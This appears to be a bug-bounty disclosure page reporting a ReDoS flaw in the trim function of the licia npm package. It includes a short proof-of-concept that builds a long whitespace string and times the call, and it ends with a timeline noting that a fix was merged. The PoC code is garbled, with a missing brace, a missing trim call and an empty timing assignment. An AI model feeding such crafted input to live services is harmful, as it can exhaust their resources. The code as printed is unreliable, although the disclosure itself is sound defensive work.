Inefficient Regular Expression Complexity in liriliri/licia


Reported on

Jul 18th 2021

✍️ Description

A ReDoS (regular expression denial of service) flaw was found in the licia package. An attacker that is able to provide crafted input to the trim function may cause an application to consume an excessive amount of CPU.

Similar to

🕵️‍♂️ Proof of Concept

Create the following PoC file:

// PoC.js
var l = require('licia');

function build_blank (n) {
var ret = "1"
for (var i = 0; i < n; i++) {
ret += " "

return ret + "1";

var s = build_blank(50000)
var time =;
var time_cost = - time;
console.log("time_cost: " + time_cost)

Execute the following in terminal:

npm i licia
node poc.js

Check the Output:

time_cost: 2269

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes. 📍 Location trim.js#L26

We have contacted a member of the liriliri/licia team and are waiting to hear back a year ago
ready-research modified the report
a year ago
RedHoodSu confirmed that a fix has been merged on 10006a a year ago
RedHoodSu has been awarded the fix bounty
to join this conversation